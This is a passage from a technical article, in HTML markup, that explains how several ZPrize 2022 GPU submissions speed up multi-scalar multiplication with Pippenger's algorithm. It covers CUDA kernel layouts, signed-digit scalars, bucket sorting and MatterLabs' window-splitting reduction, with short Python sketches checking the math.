&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Most of the code is actually inside the `sppark&#x2F;msm` directory. The original `sppark&#x2F;msm` code has been modified.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The repository includes a walkthrough of the main parts of the code. Here is a summary.&lt;&#x2F;p&gt;
&lt;p&gt;Let $n=2^{26}$ be the number of base points and let $N$ be $2 * Cores &#x2F; (12 * 32)$, where $Cores$ is the number of cores of the GPU. Kernels are usually launched with grids of 12 x $N$ blocks of 32 threads. The factor $2$ in $N$ makes sense at least in the step where a binary reduction algorithm is used to add up all the points of an array of size $12 * N * 32$.&lt;&#x2F;p&gt;
&lt;p&gt;For step (1) of Pippenger.&lt;&#x2F;p&gt;
&lt;p&gt;(1.a) To compute $m_{i,j}$ for all $i,j$, a kernel with $N$ x $12$ blocks of $32$ threads is launched. All the scalars are partitioned and each thread is in charge of computing the $m_{i, j}$ for all $j$ for the coefficients $k_i$ in its partition. Partitions are of size ~ $n&#x2F;(32*N)$.&lt;&#x2F;p&gt;
&lt;p&gt;(1.b) Sequentially for each window $j$, the set of scalars $m_{i,j}$ is sorted using &lt;code&gt;cub::DeviceRadixSort::SortPairs&lt;&#x2F;code&gt;. Let us denote $m_{i, j}’$ the $i$-th scalar of window $j$ after sorting.&lt;&#x2F;p&gt;
&lt;p&gt;(1.c) Sequentially for each window $j$, the number of occurrences of each scalar $1 \leq m &amp;lt; 2^s$ in the window is computed using &lt;code&gt;cub::DeviceRunLengthEncode::Encode&lt;&#x2F;code&gt; on the previously sorted scalars $m_{i,j}’$.&lt;&#x2F;p&gt;
&lt;p&gt;(1.d) For technical reasons needed in the next step, the cumulative sum of the number of occurrences is computed using &lt;code&gt;cub::DeviceScan::InclusiveSum&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;(1.e) A kernel is launched to compute the buckets. The kernel gets a grid of size $N$ x $12$ blocks of $32$ threads. Column $j$ of the total $12$ columns handles the buckets of a window $j$. The range of indexes $1$ to $n$ is divided evenly into subranges and each thread handles the buckets corresponding to the unique scalars $m_{i,j}’$ with $i$ in its range. Ranges are slightly expanded and contracted for threads to get non-overlapping sets of scalars.&lt;&#x2F;p&gt;
&lt;p&gt;This concludes the computation of the buckets $B_{j, m}$ for all $0\leq j &amp;lt; 12$ and $1 \leq m &amp;lt; 2^s$.&lt;&#x2F;p&gt;
&lt;p&gt;For step (2) of Pippenger.&lt;&#x2F;p&gt;
&lt;p&gt;(2.a) A kernel is launched on a grid of $N$ x $12$ blocks of $32$ threads. Each thread computes an even chunk of the sum $G_j = \sum mB_{j,m}$ just as described in the paper. As before, each column of the grid handles a different window.&lt;&#x2F;p&gt;
&lt;p&gt;(2.b) For each window $j$, its chunks are added up using a binary reduction algorithm. This effectively computes all $G_j$ for $0 \leq j &amp;lt;12$.&lt;&#x2F;p&gt;
&lt;p&gt;Then step (3) of Pippenger is performed in the CPU.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;6block-submission&quot;&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;z-prize&#x2F;2022-entries&#x2F;tree&#x2F;main&#x2F;open-division&#x2F;prize1-msm&#x2F;prize1a-msm-gpu&#x2F;6block&quot;&gt;6block submission&lt;&#x2F;a&gt;&lt;&#x2F;h2&gt;
&lt;p&gt;The main contribution of this solution is a different approach to steps (1) and (2). If we forget about GPU parallelization for a moment, both steps are performed in a single step as follows.&lt;&#x2F;p&gt;
&lt;p&gt;(1’) For each window $j$, first sort all scalars $m_{i, j}$. Denote by $m_{i, j}’$ and $P_{i}’$ the sorted lists of scalars and points respectively. For each $i$ from $n$ to $1$, where $n$ is the number of base points, compute&lt;&#x2F;p&gt;
&lt;p&gt;$$\begin{aligned} t_{i-1} &amp;amp;:= t_{i} + P_{i-1}’ \\ s_{i-1} &amp;amp;:= (m_{i, j}’ - m_{i-1, j}’)t_i + s_i\end{aligned}$$&lt;&#x2F;p&gt;
&lt;p&gt;with $t_n = P_n’$ and $s_n = \mathcal O$. Then $G_j$ is equal to $m_{0,j}’t_0 + s_0$. The rest of the approach is the same as in Pippenger.&lt;&#x2F;p&gt;
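&lt;p&gt;This sorted-scalar recurrence is an Abel-summation trick: the suffix sums $t_i$ of the sorted points, together with the correction terms $s_i$, recover $G_j$ with a single scalar multiplication at the very end. A minimal Python sketch over plain integers (our own illustration, not the submission’s code):&lt;&#x2F;p&gt;

```python
# Sorted-scalar MSM: after sorting (scalar, point) pairs by scalar,
# suffix sums t_i and corrections s_i give G = m'_0 * t_0 + s_0.

def sorted_msm(ms: list[int], Ps: list[int]) -> int:
    pairs = sorted(zip(ms, Ps))               # (m'_i, P'_i), ascending
    m, P = zip(*pairs)
    n = len(pairs) - 1
    t, s = P[n], 0                            # t_n = P'_n, s_n = 0 (identity)
    for i in range(n, 0, -1):
        s = (m[i] - m[i - 1]) * t + s         # s_{i-1}, uses old t_i
        t = t + P[i - 1]                      # t_{i-1}: suffix sum grows
    return m[0] * t + s                       # m'_0 * t_0 + s_0

ms = [9, 2, 7, 2, 5]
Ps = [3, 8, 1, 6, 4]
assert sorted_msm(ms, Ps) == sum(m * P for m, P in zip(ms, Ps))
```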
&lt;h3 id=&quot;parallelization-strategy-1&quot;&gt;Parallelization strategy.&lt;&#x2F;h3&gt;
&lt;p&gt;Let $n = 2^{26}$ be the number of base points. The window size used is $21$. The $253$ bits are grouped in $11$ windows of size $21$ and an additional window of size $22$.&lt;&#x2F;p&gt;
&lt;p&gt;(1’.a) A kernel is launched on a one-dimensional grid of one-dimensional blocks of at most 128 threads. The exact size of the blocks is computed using the CUDA occupancy calculation function &lt;code&gt;cudaOccupancyMaxPotentialBlockSize&lt;&#x2F;code&gt;. The total number of threads equals the number of points. Each thread is then in charge of computing all the $m_{i, j}$ for a single scalar $k_i$.&lt;&#x2F;p&gt;
&lt;p&gt;The following steps are performed sequentially for each window $j$.&lt;&#x2F;p&gt;
&lt;p&gt;(1’.b) Having fixed $j$, the list $(m_{i, j})_{i=1}^n$ is sorted. The &lt;code&gt;cub&lt;&#x2F;code&gt; function &lt;code&gt;cub::DeviceRadixSort::SortPairs&lt;&#x2F;code&gt; is used for this. This function sorts key-value pairs. In this case, the pairs sorted are $(m_{i,j}, i)$, to keep track of which base point corresponds to which scalar in the sorted list. Let us denote by $m_{i, j}^\prime$ and $P_i^\prime$ the sorted lists of scalars and points respectively.&lt;&#x2F;p&gt;
&lt;p&gt;(1’.c) Then a kernel is launched on a one-dimensional grid of one-dimensional blocks of at most 128 threads. Again the exact size of the blocks is computed using &lt;code&gt;cudaOccupancyMaxPotentialBlockSize&lt;&#x2F;code&gt;. The range $1$ to $n$ is split evenly and each thread is in charge of computing the sum $\sum m_{i, j}^\prime P_i^\prime$ for $i$ in its range. This is done by computing $s_0$ and $t_0$ as described above. This produces a certain number of partial results (one for each thread) that we denote here by $B_{k, j}$. The sum of all these elements over all $k$ equals $G_j$.&lt;&#x2F;p&gt;
&lt;p&gt;(1’.d) The results $B_{k, j}$ for all $k$ are copied to the CPU and added sequentially to get $G_j$. Then, this is doubled $21$ times to get $2^{21}G_j$ (except for the last window where $2^{22}G_{12}$ is computed). While this happens in the CPU, steps (1’.b) and (1’.c) are handled in the GPU for the subsequent window.&lt;&#x2F;p&gt;
&lt;p&gt;Once all windows have been handled, the final sum is performed in the CPU.&lt;&#x2F;p&gt;
&lt;p&gt;A few interesting things to note about this solution.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The code is very clear. It uses OOP and many C++11 features and standard libraries.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * A naive implementation of the kernel launched in step (1&amp;#39;.c) could severely suffer from warp divergence. This is because there is a lot of branching in the construction of $t_i$ and $s_i$. For example, if one $m_{i, j}&amp;#39;$ is equal to $m_{i-1,j}&amp;#39;$ then nothing has to be done to compute $s_i$. To overcome this issue, each thread fills up a buffer of max size $10$ with the non-zero differences $m_{i, j}&amp;#39; - m_{i-1, j}&amp;#39;$ it encounters. All the elliptic curve operations are postponed until one of the threads in the warp fills out its buffer. At this point, all the threads in the warp flush their pending elliptic curve operations. To do this the warp vote function `__any_sync` is used (see [here](https:&#x2F;&#x2F;docs.nvidia.com&#x2F;cuda&#x2F;cuda-c-programming-guide&#x2F;index.html#warp-vote-functions)).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;mike-voronov-and-alex-kolganov&quot;&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;z-prize&#x2F;2022-entries&#x2F;tree&#x2F;main&#x2F;open-division&#x2F;prize1-msm&#x2F;prize1a-msm-gpu&#x2F;mikevoronov&quot;&gt;Mike Voronov and Alex Kolganov&lt;&#x2F;a&gt;&lt;&#x2F;h2&gt;
&lt;p&gt;Mainly, this submission improves over the baseline using signed scalars to reduce the number of buckets in step (1) of Pippenger (more details below). Although it also claims to use a careful tiling of threads to compute the partial sums in step (2) in Pippenger’s algorithm in parallel, there is little documentation about it.&lt;&#x2F;p&gt;
&lt;p&gt;The main contribution is in step (1). This solution uses a window size $s=23$.&lt;&#x2F;p&gt;
&lt;p&gt;(1.a) To compute $m_{i, j}$ a one-dimensional grid of one-dimensional blocks of size $256$ is launched. The total number of threads equals the number of base points, which is $2^{26}$. Each thread is in charge of computing the subscalars $m_{i, j}$ for a single $k_i$. Since the window size is $23$, all the subscalars $m_{i, j}$ satisfy $0 \leq m_{i, j} &amp;lt; 2^{23}$. If a subscalar $m_{i, j}$ turns out to be bigger than $2^{22}$, then $2^{23}$ is subtracted from it, reducing it to the range $-2^{22} \leq m_{i, j} &amp;lt; 0$, and $2^{23}$ is carried over to the next window. The sign of the negative subscalar is transferred to the base point, given that it is cheap to negate elliptic curve points. As a consequence, they end up with subscalars in the range $0 \leq m_{i, j} \leq 2^{22}$ and possibly an additional window in case the last window needs to carry scalars.&lt;&#x2F;p&gt;
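&lt;p&gt;The signed-digit trick can be sketched in a few lines of Python (our own illustration of the carry-and-negate idea, not the submission’s code):&lt;&#x2F;p&gt;

```python
# Signed-digit decomposition: split k in base 2^s, and whenever a digit
# exceeds 2^(s-1), subtract 2^s from it and carry 1 into the next
# window. Digits end up in [-2^(s-1), 2^(s-1)]; a negative digit negates
# the (cheap-to-negate) base point instead of needing extra buckets.

def signed_digits(k: int, s: int) -> list[int]:
    digits, half, full = [], 1 << (s - 1), 1 << s
    while k:
        d = k & (full - 1)
        k >>= s
        if d > half:
            d -= full        # d becomes negative ...
            k += 1           # ... and 2^s is carried to the next window
        digits.append(d)
    return digits

k, s = 0xDEADBEEF, 8
ds = signed_digits(k, s)
assert all(-(1 << (s - 1)) <= d <= (1 << (s - 1)) for d in ds)
assert sum(d << (s * j) for j, d in enumerate(ds)) == k
```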
&lt;p&gt;Windows are then separated into two groups: the windows with odd and even indexes. Windows are handled asynchronously, and it is possible to handle more than two at a time; the &lt;code&gt;config.numAsync&lt;&#x2F;code&gt; variable manages the stream count, but for an A40, two streams are enough to utilize all compute resources. The only exception is the last window, which is treated separately in the CPU, since it is the overflow window of the previous step and is therefore much smaller. Each group gets its own stream and traverses its windows sequentially to compute the buckets and the final window sum $G_j$ as follows.&lt;&#x2F;p&gt;
&lt;p&gt;(1.b) For each window $j$, it sorts the subscalars $m_{i, j}$ and precomputes the starting and ending indexes of the occurrences of each subscalar in the sorted list, along with the number of occurrences of each one. This is done using the &lt;code&gt;thrust::sort_by_key&lt;&#x2F;code&gt; and &lt;code&gt;thrust::inclusive_scan&lt;&#x2F;code&gt; functions from the &lt;code&gt;thrust&lt;&#x2F;code&gt; library. It then launches a kernel with a one-dimensional grid of one-dimensional blocks of size $32$ to compute the buckets using the above pre-computed information.&lt;&#x2F;p&gt;
&lt;p&gt;(2.a) All windows are computed in parallel in different streams (two streams were used, but it is possible to use more, depending on GPU memory).&lt;br &#x2F;&gt;
(2.b) The buckets are then sorted, such that the buckets with the most points are run first. This allows the GPU warps to run convergent workloads and minimizes the tail effect. This solution writes custom algorithms to achieve this.&lt;&#x2F;p&gt;
&lt;p&gt;Then step (3) of Pippenger is performed in the CPU.&lt;&#x2F;p&gt;
&lt;p&gt;Other things to note from this solution.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The use of the `thrust` library.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * It always uses one-dimensional grids of one-dimensional blocks of sizes either $256$ or $32$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Two streams are used to process the even and odd windows of step (1.b) in parallel, since two streams are enough to utilize all computational resources.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * It looks like it was developed and run on a memory-constrained GPU card. In step (1.b) each group reuses the allocated arrays to store the buckets. It also reuses allocated arrays for different unrelated intermediate steps in the computation of the sorted lists of subscalars and the indexes associated with the first and last occurrences of each one.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Tested ideas that didn’t work. From the README of the submission:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * NAF - signed scalars are better: NAF reduces the number of buckets to 2&#x2F;3, while signed scalars halve it&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * NAF + signed scalars - the main drawback of this variant is that the number of sums in the 2nd step doubles&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Karatsuba multiplication + Barrett reduction - turned out that the CIOS baseline Montgomery is better&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Affine summation + the Montgomery trick - turned out to be slower than the baseline summation&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;matterlabs&quot;&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;z-prize&#x2F;2022-entries&#x2F;tree&#x2F;main&#x2F;open-division&#x2F;prize1-msm&#x2F;prize1a-msm-gpu&#x2F;matter-labs&quot;&gt;MatterLabs&lt;&#x2F;a&gt;&lt;&#x2F;h2&gt;
&lt;p&gt;This solution precomputes $2^{69j}P_i$ for each input point $P_i$ and $j=0, 1, 2, 3$ (this differs from what is stated in the documentation). These are all points on the EC. We can rewrite the first sum in this way:&lt;&#x2F;p&gt;
&lt;p&gt;$$ \sum_{i=1}^n \sum_{j=0}^3 k_{ij}2^{69j} P_i$$&lt;&#x2F;p&gt;
&lt;p&gt;where each $k_{ij}&amp;lt;2^{69}$.&lt;&#x2F;p&gt;
&lt;p&gt;Since each $2^{69j}P_i$ belongs to the EC and is already computed, we can rewrite the sum as $\sum_{m=1}^{4n}k_m P_m$ (for other $k$s and other $P$s), where each $k_{m}&amp;lt;2^{69}$. This allows us to split each $k_m$ into three 23-bit windows for Pippenger’s algorithm.&lt;&#x2F;p&gt;
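&lt;p&gt;To make the regrouping concrete, here is a minimal Python sketch (ours, not the submission’s code) checking that splitting a scalar into four 69-bit subscalars preserves the product. Integers stand in for EC points, since only the additive structure matters here:&lt;&#x2F;p&gt;

```python
# Sketch: split a scalar k into four 69-bit subscalars k_j, so that
# k = sum_j k_j * 2^(69 j), and check that k * P is preserved.

def split_scalar(k, window_bits=69, num_windows=4):
    """Return [k_0, ..., k_3] with k = sum(k_j << (69 * j))."""
    mask = (1 << window_bits) - 1
    return [(k >> (window_bits * j)) & mask for j in range(num_windows)]

k = 0x1234_5678_9abc_def0_1234_5678_9abc_def0_1234_5678_9abc_def0_12
P = 7  # stand-in for an EC point
subscalars = split_scalar(k)

# With 2^(69 j) * P precomputed, k * P becomes a sum of four small products,
# each of which Pippenger then cuts into three 23-bit windows.
assert all(kj < (1 << 69) for kj in subscalars)
assert sum(kj * (1 << (69 * j)) * P for j, kj in enumerate(subscalars)) == k * P
```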
&lt;p&gt;The &lt;code&gt;Arkworks&lt;&#x2F;code&gt; library is used to represent finite fields, elliptic curves, and big integers in the tests. However, for the MSM algorithm itself, these structures are implemented by the authors, who use optimized versions of the operations when running device code on the GPU.&lt;&#x2F;p&gt;
&lt;p&gt;A new library called &lt;code&gt;Bellman-CUDA&lt;&#x2F;code&gt; is developed. It is used to perform operations on finite fields, sorting (using &lt;code&gt;CUB&lt;&#x2F;code&gt; utilities), run-length encoding (using &lt;code&gt;CUB&lt;&#x2F;code&gt; as well), etc., taking advantage of the GPU. The goal is probably to eventually replace the calls to &lt;code&gt;CUB&lt;&#x2F;code&gt; with more efficient algorithms.&lt;&#x2F;p&gt;
&lt;p&gt;The windows are processed in smaller parts. The first chunk of all the windows is processed first, then the second chunk of all windows, etc. This allows processing while other scalar parts are still in asynchronous transfer from the host to the device memory.&lt;&#x2F;p&gt;
&lt;p&gt;For each window chunk, a tuple index for each bucket is generated in parallel: $(i, j)$ where $i$ is the coefficient for the bucket and $j$ is the EC point in that bucket. These are sorted (in parallel) according to the first component so that we have the EC points that are to be summed up in each bucket. They are then length-encoded and sorted (in parallel as well) according to the number of points that the bucket has. In this way, the buckets that have more points will be processed first to enable efficient usage of the GPU hardware. After that, a list of offsets is generated (using the parallel algorithm to compute exclusive sums implemented by &lt;code&gt;CUB&lt;&#x2F;code&gt;) to know where each bucket starts and ends. For example:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{align}&lt;br &#x2F;&gt;
2P_1+5P_2+4P_3+1P_4+2P_5 \rightarrow (2,1), (5,2), (4,3), (1,4), (2,5) \\&lt;br &#x2F;&gt;
\rightarrow [(1, 4), (2, 1), (2, 5), (4, 3), (5, 2)], [1, 2, 4, 5], [1, 2, 1, 1] \\&lt;br &#x2F;&gt;
\rightarrow [4, 1, 5, 3, 2], [0, 1, 3, 4, 5], [1, 2, 4, 5], [1, 2, 1, 1]&lt;br &#x2F;&gt;
\end{align}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;The buckets are then aggregated in parallel.&lt;&#x2F;p&gt;
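&lt;p&gt;The worked example above can be reproduced with a short Python sketch, using plain sequential code in place of &lt;code&gt;CUB&lt;&#x2F;code&gt;’s parallel primitives:&lt;&#x2F;p&gt;

```python
# Sketch: build (bucket, point) pairs, sort by bucket index (sort_pairs),
# run-length encode the bucket indexes (run_length_encode), and take a
# prefix sum of the counts (exclusive_sum) to get the bucket offsets.

pairs = [(2, 1), (5, 2), (4, 3), (1, 4), (2, 5)]  # 2P1 + 5P2 + 4P3 + 1P4 + 2P5

pairs.sort(key=lambda t: t[0])                 # stable sort by bucket index
points = [p for _, p in pairs]                 # point indexes grouped by bucket
buckets = sorted({b for b, _ in pairs})        # unique bucket coefficients
counts = [sum(1 for b, _ in pairs if b == u) for u in buckets]

offsets = [0]                                  # bucket boundaries in `points`
for c in counts:
    offsets.append(offsets[-1] + c)

assert points == [4, 1, 5, 3, 2]
assert offsets == [0, 1, 3, 4, 5]
assert buckets == [1, 2, 4, 5]
assert counts == [1, 2, 1, 1]
```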
&lt;p&gt;The FF and EC routines have been optimized:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Based on Montgomery&amp;#39;s multiplication&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Minimized correction steps in the FF operations&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Use of XYZZ representation for the EC point accumulators&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Use of fast squaring&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;streams-and-memory-management&quot;&gt;Streams and memory management&lt;&#x2F;h3&gt;
&lt;p&gt;The following streams are created:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `stream`&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `stream_copy_scalars`&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `stream_copy_bases`&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `stream_copy_finished`&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `stream_sort_a`&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `stream_sort_b`&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The first one is the mainstream. Kernels such as &lt;code&gt;initialize_buckets&lt;&#x2F;code&gt;, &lt;code&gt;compute_bucket_indexes&lt;&#x2F;code&gt;, &lt;code&gt;run_length_encode&lt;&#x2F;code&gt;, &lt;code&gt;exclusive_sum&lt;&#x2F;code&gt;, and &lt;code&gt;sort_pairs&lt;&#x2F;code&gt; are run in that stream.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;code&gt;stream_copy_scalars&lt;&#x2F;code&gt; waits for &lt;code&gt;event_scalars_free&lt;&#x2F;code&gt;.&lt;br &#x2F;&gt;
&lt;code&gt;stream_copy_scalars&lt;&#x2F;code&gt; handles the async copying of scalars and enqueues &lt;code&gt;event_scalars_loaded&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;code&gt;stream_copy_bases&lt;&#x2F;code&gt; waits for &lt;code&gt;event_scalars_loaded&lt;&#x2F;code&gt; and &lt;code&gt;event_bases_free&lt;&#x2F;code&gt;. This stream also handles the async copying of bases and queues &lt;code&gt;event_bases_loaded&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;code&gt;stream&lt;&#x2F;code&gt; waits for &lt;code&gt;event_scalars_loaded&lt;&#x2F;code&gt;, handles the kernel &lt;code&gt;compute_bucket_indexes&lt;&#x2F;code&gt;, and queues &lt;code&gt;event_scalars_free&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;code&gt;stream&lt;&#x2F;code&gt; handles the sorting of the indexes and the asynchronous allocation of memory for the indexes and run lengths, as well as the &lt;code&gt;exclusive_sum&lt;&#x2F;code&gt; kernel and the allocation of memory for the offsets.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;code&gt;stream&lt;&#x2F;code&gt; enqueues &lt;code&gt;event_sort_inputs_ready&lt;&#x2F;code&gt;. &lt;code&gt;stream_sort_a&lt;&#x2F;code&gt; and &lt;code&gt;stream_sort_b&lt;&#x2F;code&gt; wait on that event to handle the sorting of the pairs on the GPU.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;code&gt;stream_sort_a&lt;&#x2F;code&gt; enqueues &lt;code&gt;event_sort_a&lt;&#x2F;code&gt; and &lt;code&gt;stream_sort_b&lt;&#x2F;code&gt; enqueues &lt;code&gt;event_sort_b&lt;&#x2F;code&gt;. &lt;code&gt;stream&lt;&#x2F;code&gt; waits on that event and also on &lt;code&gt;event_bases_loaded&lt;&#x2F;code&gt; before handling the kernel that aggregates the buckets. &lt;code&gt;stream&lt;&#x2F;code&gt; enqueues the (async) freeing of memory for the bases.&lt;&#x2F;p&gt;
&lt;p&gt;On the last loop of window chunk processing, &lt;code&gt;stream_copy_finished&lt;&#x2F;code&gt; waits for &lt;code&gt;event_scalars_loaded&lt;&#x2F;code&gt; and &lt;code&gt;event_bases_loaded&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Memory is freed and the streams (except &lt;code&gt;stream&lt;&#x2F;code&gt;, which handles the bucket reduction and window splitting kernels) are destroyed.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;bucket-aggregation-algorithm&quot;&gt;Bucket aggregation algorithm&lt;&#x2F;h3&gt;
&lt;p&gt;This algorithm is used after having every bucket computed, and is the basis for a parallelization strategy to aggregate buckets. It is an alternative to the classic sum of partial sums trick in Pippenger’s. In what follows we assume every bucket has already been computed and the remaining problem is to add up all the points in every window.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;notation&quot;&gt;Notation&lt;&#x2F;h3&gt;
&lt;p&gt;Let us fix some notation. Let $W=(B_0, \dots, B_{2^{b}-1})$ be a tuple of $2^b$ elliptic curve points. Let us call such a tuple a &lt;strong&gt;$b$-bit window&lt;&#x2F;strong&gt;. To every window $W$ we associate an elliptic curve point $P_W$ defined as&lt;&#x2F;p&gt;
&lt;p&gt;$$P_W := B_1 + 2B_2 + \cdots + (2^{b}-1)B_{2^{b}-1}$$&lt;&#x2F;p&gt;
&lt;p&gt;We call a tuple of $m$ such windows $C = (W_0, \dots, W_{m-1})$ of the same length $2^{b}$ a &lt;strong&gt;window configuration&lt;&#x2F;strong&gt;. We say that the window configuration has shape $(m, b)$. Every window configuration has an associated elliptic curve point defined by&lt;&#x2F;p&gt;
&lt;p&gt;$$P_C := P_{W_0} + 2^{b}P_{W_1} + 2^{2b}P_{W_2} + \cdots + 2^{(m-1)b}P_{W_{m-1}}$$&lt;&#x2F;p&gt;
&lt;p&gt;In the context of MSM, each $B_i$ is a bucket and $P_C$ is the desired final result.&lt;&#x2F;p&gt;
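&lt;p&gt;As a quick sanity check of this notation, here is a small Python sketch (ours, with integers standing in for EC points, since only the additive structure matters):&lt;&#x2F;p&gt;

```python
# Sketch: P_W is the usual weighted bucket sum, and P_C glues m windows
# of b bits together with powers of 2^b.

def window_point(W):
    """P_W = B_1 + 2*B_2 + ... + (2^b - 1)*B_{2^b - 1}."""
    return sum(i * B for i, B in enumerate(W))

def config_point(C, b):
    """P_C = P_{W_0} + 2^b P_{W_1} + ... + 2^{(m-1)b} P_{W_{m-1}}."""
    return sum(window_point(W) << (b * j) for j, W in enumerate(C))

# A toy configuration of shape (m, b) = (2, 2): two 2-bit windows.
C = [[0, 3, 1, 4], [0, 2, 0, 1]]
assert window_point(C[0]) == 3 + 2 * 1 + 3 * 4          # = 17
assert config_point(C, 2) == 17 + 4 * (2 + 3 * 1)       # = 37
```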
&lt;h3 id=&quot;reduction-process&quot;&gt;Reduction process&lt;&#x2F;h3&gt;
&lt;p&gt;Let us assume every bucket has already been computed and let $C$ be the corresponding window configuration. MatterLabs’ solution implements an algorithm to obtain $P_C$ by iteratively reducing a window configuration $C_i$ of shape $(m, b)$ to another window configuration $C_{i+1}$ of shape $(2m, \lceil b&#x2F;2 \rceil)$. At every step, the point $P_{C_{i}}$ is not necessarily equal to $P_{C_{i+1}}$, but it can be obtained from $C_{i+1}$ by shifting some scalars. See below for the details. The process starts with a configuration $C$ of shape $(3, 23)$ and ends with a configuration $D$ of shape $(96, 1)$. At this point, $P_C$ is computed from $D$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;window-splitting&quot;&gt;Window splitting&lt;&#x2F;h3&gt;
&lt;p&gt;The reduction consists of splitting every window of a configuration. Let us describe this splitting process for a single $b$-bit window $W$. We construct from it two new $\lceil b&#x2F;2\rceil$-bit windows $\hat W_0$ and $\hat W_1$ such that&lt;&#x2F;p&gt;
&lt;p&gt;$$P_W = P_{\hat W_0} + 2^{\lceil b&#x2F;2 \rceil}P_{\hat W_1}.$$&lt;&#x2F;p&gt;
&lt;p&gt;The idea behind this construction is the following. Every component of $W$ is of the form $B_r$, where $0\leq r &amp;lt; 2^b$. We can write $r = a + c2^{k}$, where $k=\lceil b&#x2F;2\rceil$ and $0\leq a,c &amp;lt; 2^k$. Then $B_r$ is put into two new buckets, namely the $a$-th component of window $\hat W_0$ and the $c$-th component of window $\hat W_1$.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;case-b-even&quot;&gt;Case $b$ even:&lt;&#x2F;h4&gt;
&lt;p&gt;Write $b=2k$. Let $W$ be a $b$-bit window. Define the new $k$-bit windows $\hat W_0$ and $\hat W_{1}$ as follows.&lt;&#x2F;p&gt;
